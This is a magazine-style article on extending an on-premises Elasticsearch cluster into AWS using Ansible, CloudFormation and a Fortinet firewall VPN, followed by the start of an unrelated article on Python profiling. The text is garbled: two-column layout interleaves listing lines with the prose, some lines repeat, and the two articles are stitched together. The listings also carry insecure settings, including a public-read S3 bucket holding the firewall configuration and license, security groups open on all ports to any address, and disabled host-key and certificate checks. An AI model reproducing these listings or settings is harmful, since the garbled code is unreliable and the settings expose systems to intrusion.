The advantage of a hybrid cloud is that companies can use it to absorb peak loads or special requirements without having to procure new hardware for five- or six-digit figures.
In this article, I show how you can add a cloud extension to an Ansible [4] role that addresses local servers. To do this, you extend a local Playbook for an Elasticsearch cluster so that it can also be used in the cloud, and the resources disappear again after use.

Cloudy Servers

In classical data center operation, a server is typically used for a project and installed by an admin. It then runs through a life cycle in which it receives regular patches. At some point, it is no longer needed or is outdated. In the virtualized world, the same thing happens in principle, only with virtual servers. However, for performance reasons, you no longer necessarily retire them. With a few commands or clicks, you can simply assign more and faster resources.
Things are different in the cloud, where you have a service in mind. To operate it, you have to provide defined resources for a certain period of time, build these services in an automated process, to the extent possible (sometimes even from scratch), use them, and only pay the public cloud providers for the period of use. Then, you shut down the machines, reducing resource requirements to zero.
If these resources include virtual machines (VMs), you again build them automatically, use them, and delete them. The classic server life cycle is therefore irrelevant and is degraded to a component in an architecture that an admin brings to life at the push of a button.

Visible for Everyone?

One popular misconception about the use of public cloud services is that these services are "freely accessible on the Internet." This statement is not entirely true, because most cloud providers leave it to the admin to decide whether to provide a service or a VM with a publicly accessible IP address. Additionally, you usually have to activate explicitly all the services you want to be accessible from outside, although this usually does not apply to the services required for administration – that is, Secure Shell (SSH) for Linux VMs and the Remote Desktop Protocol (RDP) for Windows VMs. By way of an example, when an AWS admin picks a database from the Database-as-a-Service offerings, they can only access it through the IP address they use to control the AWS Console.
If you set up the virtual networks in the public cloud with private addresses only, they are just as invisible from the Internet as the servers in your own data center.

Cloudbnb

At AWS, but also in the Google and Microsoft clouds, for example, the concept of the virtual private cloud (VPC) acts as the account's backbone. With an AWS account in each region, you can even operate several VPC instances side by side.
To connect to this network, the cloud providers offer a site-to-site VPN service. Alternatively, you can set up your own VPN gateway (e.g., in the form of a VM, such as Linux with IPsec/OpenVPN) or a virtual firewall appliance, the latter of which offers a higher level of security, but usually comes at a price.
This service ultimately creates a structure that, conceptually, does not differ fundamentally from the way in which you would connect branch offices to the head office – with one difference: The public cloud provider can potentially access the data on the machines and in the containers.
Protecting Data

The second major security concern relates to storing data. Especially when processing personal information for members of the European Union (EU), you have to be careful for legal reasons about which of the cloud provider's regions is used to store the data. Relocating the customer database to Japan might turn out to be a less than brilliant idea.
Even if the data is stored on servers within the EU, the question of who gets access still needs to be clarified. Encrypting data in AWS is possible [5]. If you do not have confidence in your abilities, you could equip a Linux VM with a self-encrypted volume (e.g., LUKS [6]) and not store the password on the server. With AWS, this does not work for system disks, but it does at least for data volumes. After starting the VM, you have to send the password. This process can be automated from your own data center. The only possible route of access for the provider is to read the machine RAM; this risk exists where modern hardware enables live encryption, as well.
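A rough sketch of that automation – the host, user, device name, and mapper name are placeholders, and the example assumes the volume key can be fed on stdin and that sudo does not prompt for a password:

echo -n "$LUKS_PASSPHRASE" | ssh centos@10.100.0.10 \
  'sudo cryptsetup luksOpen /dev/xvdf datavol --key-file=-'
ssh centos@10.100.0.10 'sudo mount /dev/mapper/datavol /srv/data'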
As a last resort, you can ensure that the computing resources in the cloud only access data managed by the local data center. However, you will need a powerful Internet connection.

Solving a Problem

Assume you have a local Elasticsearch cluster of three nodes: a master node, which also houses Logstash and Kibana, and two data nodes with data on board (Figure 1).

Figure 1: A secure network architecture (here the rough structure) should connect the nodes in the local data center with those on AWS.

You now want to provide this cluster with two more data nodes in the public cloud temporarily. You could have several reasons for this; for example, you might want to replace the physical data nodes because of hardware problems, or you might temporarily need higher performance for data analysis. Because it is not typically worthwhile to procure new hardware on a temporary basis, the public cloud is a solution. The logic is shown in Figure 1; the machines started there must become part of the Elastic cluster.
The following explanations assume you have already written Ansible roles for installing the Elasticsearch-Logstash-Kibana (ELK) cluster. You will find a listing for a Playbook on the ADMIN FTP site [7]. Thanks to the structure of these roles, you can add more nodes by appending parameters to the Hosts file, and it includes installing the software on the node.
The roles that Ansible calls are determined by the Hosts file (usually in /etc/ansible/hosts) and the variables set in it for each host. Listing 1 shows the original file.

Listing 1: ELK Stack Hosts File
10.0.2.25 ansible_ssh_user=root logstash=1 kibana=1 masternode=1 grafana=1 do_ela=1
10.0.2.26 ansible_ssh_user=root masternode=0 do_ela=1
10.0.2.44 ansible_ssh_user=root masternode=0 do_ela=1

Host 10.0.2.25 is the master node on which all software runs. The other two hosts are the data nodes of the cluster. The variable do_ela controls whether the Elasticsearch role can perform installations. When expanding the cluster, this ensures that Ansible does not reconfigure the existing nodes – but more about the details later.

Extending the Cluster in AWS

The virtual infrastructure in AWS comprises a VPC with two subnets. One subnet can be reached from the Internet; the other represents the internal area, which also contains the two servers on which data nodes 3 and 4 are to run. In between is a virtual firewall, by Fortinet in this case, that terminates the VPN tunnel and controls access with firewall rules.
This setup requires several configuration steps in AWS: You need to create the VPC with a main network. On this, you then assign all the subnets: one internal (inside) and one accessible from the Internet (outside). Then, you create an Internet gateway in the outside subnet. Through this, the data traffic migrating toward the Internet finds an exit from the cloud. For this purpose, you define a routing table for the outside subnet that specifies this Internet gateway as the standard route (Figure 2).

Figure 2: A firewall separates an external subnet and an internal subnet (right). In detail, the AWS connection looks slightly different.

Cloud Firewall

In the next step, you create a security group that comprises host-related firewall rules for AWS. Because the firewall can protect itself, the group opens the firewall for all incoming and outgoing traffic, although this could be restricted. The next step is to create an S3 bucket that contains the starting configuration and the license for the firewall. Next, you generate the config file for the firewall and upload it with the license. For a rented, but more expensive, firewall, this license information can also be omitted.
Now set up network interfaces for the firewall in the two subnets. Also, create a role that later allows the firewall instance to access the S3 bucket. Assign the network interfaces and the role to the firewall instance to be created, and link the subnets to the firewall. Create a routing table for the inside subnet and specify the firewall network card responsible for the inside network as the target; then, generate a public IP address and assign it to the outside network interface.
The next step is to set up a security group for the servers. To do this, first create two server instances on the inside subnet and change the inside firewall interface from a DHCP client to the static IP address that the AWS firewall has currently assigned to the card. Now set up a VPN tunnel from the local network into the AWS cloud. You need to define the rules and routes on the firewall on the local network. At the end of this configuration marathon, and assuming that all the new cloud servers can be reached, finally install and configure the Elastic stack on the two new AWS servers (Figure 3).

Figure 3: The AWS firewall picks up its configuration from an S3 bucket.

Cloud Shaping

In principle, Ansible would be able to perform all these tasks, but that would cause problems when cleaning up the ensemble in the cloud, at the latest. You would either have to save the information of the components created there locally, or you would have to search the Playbook for the components to be removed before the Playbook cleans them up.
A stack (similar to OpenStack) in which you describe the complete infrastructure, which can be parameterized in YAML or JSON format, is easier. Then, you build the stack with a call (also using Ansible) and clear it up with another call. The proprietary AWS technology for this is known as CloudFormation.
CloudFormation lets the stack receive a construction parameter: in this example, the IP addresses of the networks in the VPC. The author of the stack can also enter a return value, which is typically the external IP address of a generated object, so that the user of the stack knows how to use the cloud service.
Most VM images in AWS use cloud-init technology (please see the "cloud-init" box). Because CloudFormation can also provide cloud-init data to a VM, where do you draw the line between Ansible and CloudFormation? Where it is practicable and reduces the total overhead.

cloud-init
Cloud-init is a standard originally developed by Canonical and now used by all manufacturers to start instances in the cloud on the basis of operating system images. These instances set a self-defined locale, a host name, SSH keys, and temporary mount points, but also user data. Cloud-init collaborates with your configuration management solution of choice, whether Chef, Puppet, Ansible, or Salt.

Fixed and Variable

The fixed components of the target infrastructure are the VMs (the firewall and the two servers for Elastic), the network structure, the routing structure, and the logic of the security groups. All of this information should definitely be included in the CloudFormation template.
The network's IP addresses, the AWS region, and the names of the objects are variable and used as parameters in the stack definition; you have to specify them when calling the stack. The variables also include the name of the S3 bucket for the cloud-init configuration of the firewall and the public SSH key stored with AWS, which is used to enable access to the Linux VMs.
Finally, you need the internal IP addresses of the Linux VMs, the external public IP address of the firewall, and the internal private IP address of the firewall for further configuration. Accordingly, these addresses pertain to the return values of the stack.
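To illustrate what calling the stack looks like, here is a sketch of the corresponding AWS CLI call; the template file name and the parameter values are placeholders, while the stack name VPCFG and the parameter names match the listings (the --capabilities switch is needed because the template creates IAM roles):

aws cloudformation create-stack --stack-name VPCFG \
  --template-body file://vpcfg-stack.yaml \
  --parameters ParameterKey=VPCName,ParameterValue=elastic-vpc \
               ParameterKey=KeyName,ParameterValue=mgtkey \
  --capabilities CAPABILITY_IAM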
Ansible does all the work. It fills the variables, generates the firewall configuration, which the AWS firewall

receives via cloud-init, and installs Listing 2: YAML Stack Definition Part 1
the software on the Linux VMs.
01 [...] 47 ToPort: 65535
Cloud-init could also install the soft- 02 Resources: 48 CidrIp: 0.0.0.0/0
ware, but Ansible will set up exactly 03 FortiVPC:
49 VpcId:
the roles that helped to configure 04 Type: AWS::EC2::VPC
05 Properties: 50 Ref: FortiVPC
the local servers at the beginning.
06 CidrBlock: 51
I developed the CloudFormation
07 Ref: VPCNet 52 InstanceProfile:
template from the version by fire-
08 Tags:
wall manufacturer Fortinet [8]. I 53 Properties:
09 - Key: Name
simplified the structure, compared 10 Value: 54 Path: /
with their version on GitHub, so 11 Ref: VPCName 55 Roles:
that the template in the cloud only 12 56 - Ref: InstanceRole
13 FortiVPCFrontNet:
raises a firewall and not a cluster. 57 Type: AWS::IAM::InstanceProfile
14 Type: AWS::EC2::Subnet
Additionally, the authors of the 15 Properties: 58 InstanceRole:
Fortinet template used a Lambda 16 CidrBlock: 59 Properties:
function to modify the firewall con- 17 Ref: VPCSubnetFront 60 AssumeRolePolicyDocument:
figuration. Here, this task is done 18 MapPublicIpOnLaunch: true
61 Statement:
by the Playbook, which in turn uses 19 VpcId:
20 Ref: FortiVPC 62 - Action:
the template.
21 63 - sts:AssumeRole
In the CloudFormation template, the 22 FortiVPCBackNet: 64 Effect: Allow
process can be static. The two Linux 23 Type: AWS::EC2::Subnet
65 Principal:
VMs use CentOS as their operating 24 Properties:
66 Service:
system and should run on the internal 25 CidrBlock:
26 Ref: VPCSubnetBack 67 - ec2.amazonaws.com
subnet; you simply attach them to the
27 MapPublicIpOnLaunch: false 68 Version: 2012-10-17
template and the return values. List-
28 AvailabilityZone: !GetAtt 69 Path: /
ings 2 through 4 show excerpts from FortiVPCFrontNet.AvailabilityZone
the stack definition in YAML format. 70 Policies:
29 VpcId:
The complete YAML file can be down- 30 Ref: FortiVPC 71 - PolicyDocument:
loaded from the ADMIN anonymous 31 72 Statement:
FTP site [7]. 32 FortiSecGroup: 73 - Action:
33 Type: AWS::EC2::SecurityGroup
The objects of the AWS::EC2::Instance 74 - ec2:Describe*
34 Properties:
type are the VMs designed to extend 35 GroupDescription: Group for FG 75 - ec2:AssociateAddress
the Elastic stack (Listings 3 and 4). 36 GroupName: fg 76 - ec2:AssignPrivateIpAddresses
Because of the firewall, the VM is 37 SecurityGroupEgress: 77 - ec2:UnassignPrivateIpAddresses
more complex to configure; it has to 38 - IpProtocol: -1
78 - ec2:ReplaceRoute
39 CidrIp: 0.0.0.0/0
have two dedicated interface objects 79 - s3:GetObject
40 SecurityGroupIngress:
so that routing can point to it (List- 41 - IpProtocol: tcp 80 Effect: Allow
ing 3, line 11). 42 FromPort: 0 81 Resource: '*'
Importantly, the firewall instance and 43 ToPort: 65535
82 Version: 2012-10-17
both generated interfaces are located in 44 CidrIp: 0.0.0.0/0
45 - IpProtocol: udp 83 PolicyName: ApplicationPolicy
the same availability zone; otherwise,
46 FromPort: 0 84 Type: AWS::IAM::Role
the stack will fail. To this end, the VMs
contain descriptions, and the second
subnet contains the reference to the command, which specifies the name described and uploads it together with
availability zone of the first subnet. of the YAML file created and fills the license.
The UserData part of the firewall in- the parameters at the beginning of The next task creates the complete
stance (Listing 3, line 18) contains a the stack. The S3 bucket you want stack (Listing 6). What’s new is the
description file that tells the VM where to pass in must already exist. Both connection to the old Elasticsearch
to find the configuration and license the license and the generated con- Playbook or Hosts file. The latter has
file previously uploaded by Ansible. figuration should be uploaded up a group named elahosts, which adds
The network configuration has al- front. All these tasks are done by the IP addresses of the two new serv-
ready been described and is defined the Ansible Playbook, as shown in ers to the Playbook so that a total of
at the top of Listing 2. The finished Listings 5 through 9. five hosts are in the list for further
template can now be run at the com- The Playbook uses multiple “plays.” execution of the Playbook. However,
mand line with the The first (Listing 5) creates the con- some operations will only take place
figuration for the firewall and, if not on the new hosts. Listing 6 (lines 44
aws cloudformation create-stack available, the S3 bucket (line 20) as and 49) creates the newhosts group,


Listing 3: YAML Stack Definition Part 2


01 FortiInstance: 33 - Ref: S3Region 67
02 Type: "AWS::EC2::Instance" 34 - '"' 68 DefRoutePub:
03 Properties: 35 - ",\n"
69 DependsOn: AttachGateway
04 IamInstanceProfile: 36 - '"license"'
05 Ref: InstanceProfile 37 - ' : ' 70 Properties:
06 ImageId: "ami-06f4dce9c3ae2c504" # 38 - '"' 71 DestinationCidrBlock: 0.0.0.0/0
for eu-west-3 paris 39 - / 72 GatewayId:
07 InstanceType: t2.small 40 - Ref: LicenseFileName 73 Ref: InternetGateway
08 AvailabilityZone: !GetAtt 41 - '"'
74 RouteTableId:
FortiVPCFrontNet.AvailabilityZone 42 - ",\n"
09 KeyName: 43 - '"config"' 75 Ref: RouteTablePub
10 Ref: KeyName 44 - ' : ' 76 Type: AWS::EC2::Route
11 NetworkInterfaces: 45 - '"' 77
12 - DeviceIndex: 0 46 - /fg.txt
78 RouteTablePriv:
13 NetworkInterfaceId: 47 - '"'
14 Ref: fgteni1 48 - "\n" 79 [...]
15 - DeviceIndex: 1 49 - '}' 80
16 NetworkInterfaceId: 50 81 DefRoutePriv:
17 Ref: fgteni2 51 InternetGateway: 82 [...]
18 UserData: 52 Type: AWS::EC2::InternetGateway
83
19 Fn::Base64: 53
20 Fn::Join: 54 AttachGateway: 84 SubnetRouteTableAssociationPub:
21 - '' 55 Properties: 85 Properties:
22 - 56 InternetGatewayId: 86 RouteTableId:
23 - "{\n" 57 Ref: InternetGateway
87 Ref: RouteTablePub
24 - '"bucket"' 58 VpcId:
25 - ' : "' 59 Ref: FortiVPC 88 SubnetId:
26 - Ref: S3Bucketname 60 Type: AWS::EC2::VPCGatewayAttachment 89 Ref: FortiVPCFrontNet
27 - '"' 61 90 Type:
28 - ",\n" 62 RouteTablePub: AWS::EC2::SubnetRouteTableAssociation
29 - '"region"' 63 Type: AWS::EC2::RouteTable
91
30 64 Properties:
31 - ' : ' 65 VpcId: 92 SubnetRouteTableAssociationPriv:
32 - '"' 66 Ref: FortiVPC 93 [...]

to which it adds the two hosts.
The next play (Listing 7) configures the firewall. In its existing configuration, the static IP address for the inside network card is missing – AWS only sets this when creating the instance. Because the data is now known, the Playbook can define the IP address.
When logging in to the firewall for the first time, the firewall requires a password change. You can use several methods to set up Fortigate in Ansible. However, the FortiOS network modules that have been included in the Ansible distribution for a while do not yet work properly. The raw approach is used here (Listing 7, line 10), which pushes the commands onto the device, as on the command line. The first two lines of the raw task set the password, which, in the AWS version, is based on the instance ID. Because the license has already been installed, the firewall reboots after installation. At the end, the Ansible script in Listing 7 waits for the reboot to occur and then for it to reach the firewall again.
A play now follows that teaches the local firewall what the VPN tunnel to the firewall looks like in AWS (Listing 8). The VPN definition at the other end was in the previously uploaded configuration. Because of the described problems with the Ansible modules for FortiOS (I suspect incompatibilities between Ansible modules and the Python fosapi), the play uses Ansible's URI method to configure the firewall. Authentication for the API requires a login process; it then returns a token that is used in the following REST calls. The configuration initially consists of the key exchange phase1 and phase2 parameters. The phase1 parameter contains the password, crypto parameters, and IP address of the firewall in AWS. The phase2 parameter also provides crypto parameters

Listing 4: YAML Stack Definition Part 3

01 [...]
02 ServerInstance:
03   Type: "AWS::EC2::Instance"
04   Properties:
05     ImageId: "ami-0e1ab783dc9489f34" # Centos7 for paris
06     InstanceType: t3.2xlarge
07     AvailabilityZone: !GetAtt FortiVPCFrontNet.AvailabilityZone
08     KeyName:
09       Ref: KeyName
10     SubnetId:
11       Ref: FortiVPCBackNet
12     SecurityGroupIds:
13       - !Ref ServerSecGroup
14
15 Server2Instance:
16   Type: "AWS::EC2::Instance"
17   Properties:
18     ImageId: "ami-0e1ab783dc9489f34" # Centos7 for paris
19 [...]

Listing 5: Ansible Playbook Part 1


01 --- 17 fgtpw: Firewall-Passwort 34 src: "{{ licensefile }}"
02 - name: Create VDC in AWS with fortigate as 18 35 mode: put
front 19 tasks: 36
03 hosts: localhost 20 - name: Create S3 Bucket for data 37 - name: Generate Config
04 connection: local 21 aws_s3: 38 template:
05 gather_facts: no 22 bucket: "{{ s3name }}" 39 src: awsforti-template.conf.j2
06 vars: 23 region: "{{ region }}" 40 dest: fg.txt
07 region: eu-west-3 24 mode: create 41
08 licensefile: license.lic 25 permission: public-read 42 - name: Upload Config
09 wholenet: 10.100.0.0/16 26 register: s3bucket 43 aws_s3:
10 frontnet: 10.100.254.0/28 27 44 bucket: "{{ s3name }}"
11 netmaskback: 17 28 - name: Upload License 45 region: "{{ region }}"
12 backnet: "10.100.0.0/{{ netmaskback }}" 29 aws_s3: 46 overwrite: different
13 lnet: 10.0.2.0/24 30 bucket: "{{ s3name }}" 47 object: "/fg.txt"
14 rnet: "{{ backnet }}" 31 region: "{{ region }}" 48 src: "fg.txt"
15 s3name: stackdata 32 overwrite: different 49 mode: put
16 keyname: mgtkey 33 object: "/{{ licensefile }}" 50 [...]

Listing 6: Ansible Playbook Part 2


01 [...] 22 - name: Print Results outputs.Server2Address }}"
02 - name: Create Stack 23 [...] 42
03 cloudformation: 24 43 - name: Add NewGroup1
04 stack_name: VPCFG 25 - name: Wait for VM to be up 44 add_host:
05 state: present 26 [...] 45 groupname: newhosts
06 region: "{{ region }}" 27 46 hostname: "{{ stackinfo.stack_
07 template: fortistack.yml 28 - name: New Group outputs.Server1Address }}"
08 template_parameters: 29 add_host: 47
09 InstanceType: c5.large 30 groupname: fg 48 - name: Add NewGroup2
10 FGUserName: admin 31 hostname: "{{ stackinfo.stack_ 49 add_host:
11 KeyName: "{{ keyname }}" outputs.FortiGatepubIp }}" 50 groupname: newhosts
12 VPCName: VDCVPC 32 51 hostname: "{{ stackinfo.stack_
13 VPCNet: "{{ wholenet }}" 33 - name: Add ElaGroup1 outputs.Server2Address }}"
14 Kubnet: "{{ lnet }}" 34 add_host: 52
15 VPCSubnetFront: "{{ frontnet }}" 35 groupname: elahosts 53 - name: Set Fact
16 VPCSubnetBack: "{{ backnet }}" 36 hostname: "{{ stackinfo.stack_ 54 set_fact:
17 S3Bucketname: "{{ s3name }}" outputs.Server1Address }}" 55 netmaskback: "{{ netmaskback }}"
18 LicenseFileName: 37 56
"{{ licensefile }}" 38 - name: Add ElaGroup2 57 - name: Set Fact
19 S3Region: "{{ region }}" 39 add_host: 58 set_fact:
20 register: stackinfo 40 groupname: elahosts 59 fgtpw: "{{ fgtpw }}"
21 41 hostname: "{{ stackinfo.stack_ 60 [...]

and data for the local and remote networks. The configuration also provides a route (line 62) that passes the network on the AWS side to the VPN tunnel, and two firewall rules that allow traffic from and to the private network on the AWS side (lines 71 and 85).
A bit further down (Listing 9), the Playbook sets the do_ela parameter to 1 for the new hosts so that this role will also install Elasticsearch later. It uses 0 as the value for masternode, because the new hosts are data nodes. Because it usually takes some time for the VPN connection to be ready for use, the play now waits for the master node of the Elastic cluster until it can reach a new node via SSH.
The last piece of the Playbook finally installs Elasticsearch on the new node and adapts its configuration to match the existing cluster. The role takes the major version of Elasticsearch as a parameter and a path in which the Elasticsearch server can store the data, which allows you to insert a separate mount point on a data-only disk.
Within AWS, all systems are prepared for IPv6, but this does not apply to the configuration used here. Therefore, the first task forces you to switch to IPv4. The second one updates the configuration of the system. In the third task, the Elastic cluster role finally installs and configures the software.
Because Ansible only creates the Elasticsearch user to which the elkdata/ folder should belong during the installation, the script also has to tweak the permissions and restart Elasticsearch (starting in line 46).
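Before moving on, it can be handy to confirm from the management host that the new data nodes really joined. The following is only a minimal sketch using the Python standard library; the address 10.0.2.25 is the master node the Playbook already talks to, and the expected node count of five comes from the description above:

import json
import urllib.request

# Query the cluster health API on the existing master node
with urllib.request.urlopen("http://10.0.2.25:9200/_cluster/health") as response:
    health = json.loads(response.read().decode("utf-8"))

# After the expansion, number_of_nodes should report 5
print(health["status"], health["number_of_nodes"])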


Listing 7: Ansible Playbook Part 3


01 [...] FGIntAddress }}/17"
02 - name: ChangePW 18 next
03 hosts: fg
19 end
04 vars:
05 ansible_user: admin 20 tags: pw
06 ansible_ssh_common_args: -o StrictHostKeyChecking=no 21 - name: Wait for License Reboot
07 ansible_ssh_pass: "{{ hostvars['localhost'].stackinfo.stack_ 22 pause:
outputs.FortiGateId }}" 23 minutes: 1
08 gather_facts: no
24
09
10 tasks: 25 - name: Wait for VM to be up
11 - raw: | 26 wait_for:
12 "{{ hostvars['localhost'].fgtpw }}" 27 host: "{{ inventory_hostname }}"
13 "{{ hostvars['localhost'].fgtpw }}" 28 port: 22
14 config system interface
29 state: started
15 edit port2
16 set mode static 30 delegate_to: localhost
17 set ip "{{ hostvars['localhost'].stackinfo.stack_outputs. 31 [...]

Listing 8: Ansible Playbook Part 4


01 [...] 51 url:
02 - name: Local Firewall Config https://{{ localfw }}/api/v2/cmdb/vpn.ipsec/phase2-interface
03 hosts: localhost 52 validate_certs: no
04 connection: local
53 method: POST
05 gather_facts: no
54 headers:
06 vars:
55 X-CSRFTOKEN: "{{ token }}"
07 localfw: 10.0.2.90
56 Cookie: "{{ uriresult.set_cookie }}"
08 localadmin: admin
57 body: "{{ lookup('template', 'forti-phase2.j2') }}"
09 localpw: ""
10 vdom: root 58 body_format: json
11 lnet: 10.0.2.0/24 59 register: answer
12 rnet: 10.100.0.0/17 60 tags: phase2
13 remotefw: "{{ stackinfo.stack_outputs.FortiGatepubIp }}" 61
14 localinterface: port1 62 - name: Route old style
15 psk: "<Password>" 63 [...]
16 vpnname: elavpn 64
17 65 - name: Local Object Old Style
18 tasks: 66 [...]
19 67
20 - name: Get the token with uri 68 - name: Remote Object Old Stlye
21 uri: 68 - name: Remote Object Old Style
22 url: https://{{ localfw }}/logincheck 70
23 method: POST 71 - name: FW-Rule-In old style
24 validate_certs: no 72 uri:
25 body: "ajax=1&username={{ localadmin }}&password={{ localpw }}" 73 url: https://{{ localfw }}/api/v2/cmdb/firewall/policy
26 register: uriresult 74 validate_certs: no
27 tags: gettoken 75 method: POST
28 76 headers:
29 - name: Get Token out 77 Cookie: "{{ uriresult.set_cookie }}"
30 set_fact: 78 X-CSRFTOKEN: "{{ token }}"
31 token: "{{ 79 body:
32 uriresult.cookies['ccsrftoken'] | regex_replace('\"', '') }}" 80 [...]
33 81 body_format: json
34 - debug: msg="{{ token }}"
82 register: answer
35
83 tags: rulein
36 - name: Phase1 old Style
84
37 uri:
85 - name: FW-Rule-out old style
38 url:
https://{{ localfw }}/api/v2/cmdb/vpn.ipsec/phase1-interface 86 uri:
39 validate_certs: no 87 url: https://{{ localfw }}/api/v2/cmdb/firewall/policy
40 method: POST 88 validate_certs: no
41 headers: 89 method: POST
42 X-CSRFTOKEN: "{{ token }}" 90 headers:
43 Cookie: "{{ uriresult.set_cookie }}" 91 Cookie: "{{ uriresult.set_cookie }}"
44 body: "{{ lookup('template', 'forti-phase1.j2') }}" 92 X-CSRFTOKEN: "{{ token }}"
45 body_format: json 93 body:
46 register: answer 94 [...]
47 tags: phase1 95 body_format: json
48 96 register: answer
49 - name: Phase2 old style 97 tags: ruleout
50 uri: 98 [...]


This completes the cloud expansion. If everything worked out, the Kibana console will be presented with the view from Figure 4 after a few moments.

Big Cleanup

If you want to remove the extension, you have to remove the nodes from the cluster with an API call:

curl -X PUT 10.0.2.25:9200/_cluster/settings \
     -H 'Content-Type: application/json' \
     -d '{ "transient" : {"cluster.routing.allocation.exclude._ip":"10.100.68.139" } }'

This command blocks further assignments and causes the cluster to move all shards away from this node. After the action, no more shards are assigned, and you can simply switch off the node.

Listing 9: Ansible Playbook Part 5

01 [...]
02 - name: Set Facts for new hosts
03   hosts: newhosts
04 [...]
05     masternode: 0
06     do_ela: 1
07
08 - name: Wait For VPN Tunnel
09   hosts: 10.0.2.25
10 [...]
11
12 - name: Install elastic
13   hosts: elahosts
14   vars:
15     elaversion: 6
16     eladatapath: /elkdata
17     ansible_ssh_common_args: -o StrictHostKeyChecking=no
18
19   tasks:
20
21   - ini_file:
22       path: /etc/yum.conf
23       section: main
24       option: ip_resolve
25       value: 4
26     become: yes
27     become_method: sudo
28     when: do_ela == 1
29     name: Change yum.conf
30
31   - yum:
32       name: "*"
33       state: "latest"
34     name: RHUpdates
35     become: yes
36     become_method: sudo
37     when: do_ela == 1
38
39   - include_role:
40       name: matrix.centos-elasticcluster
41     vars:
42       clustername: matrixlog
43       elaversion: 6
44     when: do_ela == 1
45
46   - name: Set Permissions for data
47     file:
48       path: "{{ eladatapath }}"
49       owner: elasticsearch
50       group: elasticsearch
51       state: directory
52       mode: "4750"
53     become: yes
54     become_method: sudo
55     when: do_ela == 1
56
57   - systemd:
58       name: elasticsearch
59       state: restarted
60     become: yes
61     become_method: sudo
62     when: do_ela == 1

Conclusion
Conclusion 31 - yum: 62 when: do_ela == 1

The hybrid cloud thrives, because admins can transfer scripts and Playbooks seamlessly from their environment to the cloud world. Although higher quality cloud services exist than those covered in this article (AWS also has Elasticsearch as a Service), these services typically have only limited suitability for direct docking. To use them, you would have to take into account configuring the peculiarities of the respective cloud provider. With VMs in Microsoft Azure, however, the example shown here would work directly, so the user would only have to replace the CloudFormation part with an Azure template.

Figure 4: The status of the Elastic cluster after expansion into the AWS Cloud.

The Author
Konstantin Agouros is Head of Open Source Projects at matrix technology AG, where he and his team advise customers on open source and cloud topics. His latest book Software Defined Networking: SDN-Praxis mit Controllern und OpenFlow [Practical Applications with Controllers and OpenFlow] (in German) is published by de Gruyter.


Profiling Python code

In Profile

Profiling your Python code – as a whole or by function – shows where you should spend time speeding up your programs. By Jeff Layton

To improve the performance of your applications, you need to conduct some kind of dynamic (program, software, code) analysis, also called profiling, to measure metrics of interest. A key metric for developers is time (i.e., where is the code spending most of its time?), because it allows you to focus on areas, or hotspots, that can be made to run faster.
And, this might seem obvious, but if you don't profile for code optimization, you could flounder all over the code improving sections you think might be bottlenecks. I have seen people spend hours working a particular part of their code when a simple profile showed that portion of the code contributed very little to the overall run time. I admit that I have also done this; however, once I profiled the code, I found that I had wasted my time and needed to focus elsewhere.
Different kinds of profiling (e.g., event-based, statistical, instrumented, simulation) are used in different situations. In this article, I focus on two types: deterministic and statistical. Deterministic profiling captures every computation of the code and produces very accurate profiles, but it can greatly slow down code performance. Although you achieve very good accuracy with the profile, run times are greatly increased, and you have to wonder whether the profiling didn't adversely affect how the code ran. For example, did the profiling cause the computation bottlenecks to move to a different place in the code?
Statistical profiling, on the other hand, takes periodic "samples" of the code computations and uses them as representations of the profile of the code. This method usually has very little effect on code performance, so you can get a profile that is very close to the real execution of the code. You do have to wonder about the correct time interval to get an accurate profile of the application while not affecting the run time. Usually this means setting the time intervals to smaller and smaller values to capture the profile accurately. If the interval becomes too small, however, it almost becomes deterministic profiling, and run time is greatly increased.
If your code takes a long time to execute (e.g., hours or days), deterministic profiling might be impossible because the increase in run time is unacceptable. In this case, statistical profiling is appropriate because of the longer periods of time available to sample performance.
In this article, I focus on profiling Python code, primarily because of a current lack of Python profiling but also because I think the process of profiling Python code, creating functions, and using Numba to then compile these functions for CPUs or GPUs is a good way to help improve performance.
To help illustrate some tools you can use to profile Python code, I will use an example of an idealized molecular dynamics (MD) application. I'll work through some profiling tools and modify the code in a reasonable manner for better profiling. The first, and probably most used and flexible, method I want to mention is "manual" profiling.


Manual Profiling

The manual profiling approach is fairly simple but involves inserting timing points into your code. Timing points surround a section of code and collect the total elapsed time(s) for the section, as well as how many times the section is executed. From this information, you can calculate an average elapsed time. The timing points can be spread throughout the code, so you get an idea of how much time each section of the code takes. The elapsed times are printed at the end of execution, to give you an idea of where you should focus your efforts to improve performance.
A key advantage of this approach is its generally low overhead. Additionally, you can control which portions of the code are timed (you don't have to profile the entire code). A downside is that you have to instrument your code by inserting timing points throughout. However, inserting these points is not difficult.
An easy way to accomplish this uses the Python time module. Simple code from an article on the Better Programming [1] website (example 16) is shown in Listing 1. The code simply calls the current time before and after a section of code of interest. The difference is elapsed time, or the amount of time needed to execute that section of code.
If a section of code is called repeatedly, just sum the elapsed times for the section and sum the number of times that section is used; then, you can compute the average time through the code section. If the number of calls is large enough, you can do some quick descriptive statistics and compute the mean, median, variance, min, max, and deviations.

cProfile

cProfile is a deterministic profiler for Python and is recommended "… for most users." In general terms, it creates a set of statistics that lists the total time spent in certain parts of the code, as well as how often the portion of the code was called.
cProfile, as the name hints, is written in C as a Python extension and comes with standard Python 3, which keeps the overhead low, so the profiler doesn't affect the amount of time much.
cProfile outputs a few stats about the test code:
* ncalls – Number of calls to the portion of code.
* tottime – Total time spent in the given function (excludes time made in calls to subfunctions).
* percall – tottime divided by ncalls.
* cumtime – Cumulative time spent in the specific function, including all subfunctions.
* percall – cumtime divided by ncalls.
cProfile also outputs the file name of the code, in case multiple files are involved, as well as the line number of the function (lineno).
Running cProfile is fairly simple:

$ python -m cProfile -s cumtime script.py

The first part of the command tells Python to use the cProfile module. The output from cProfile is sorted (-s) by cumtime (cumulative time). The last option on the command line is the Python code of interest. cProfile also has an option (-o) to send the stats to an output file instead of stdout. Listing 2 shows a sample of the first few lines from cProfile on a variation of the MD code.

pprofile

To get a line-by-line profile of your code, you can use the pprofile tool for a granular, thread-aware analysis for deterministic or statistical profiling (pure Python). The form of pprofile is:

$ pprofile some_python_executable arg1 ...

After the tool finishes, it prints annotated code of each file involved in the execution.
By default, pprofile profiling is deterministic, which, although it slows down the code, produces a very complete profile. You can also use pprofile in a statistical manner, which uses much less time:

$ pprofile --statistic .01 code.py

With the statistic option, you also need to specify the period of time between sampling. In this example, a period of 0.01 seconds was used.
Be careful when using the statistic option because, if the sample time is too long, you can miss computations, and the output will incorrectly record zero percent activity. Conversely, to get a better estimation of the time spent in certain portions of the code, you have to reduce the time between samples to the point of almost deterministic profiling.

Listing 1: Time to Execute

import time

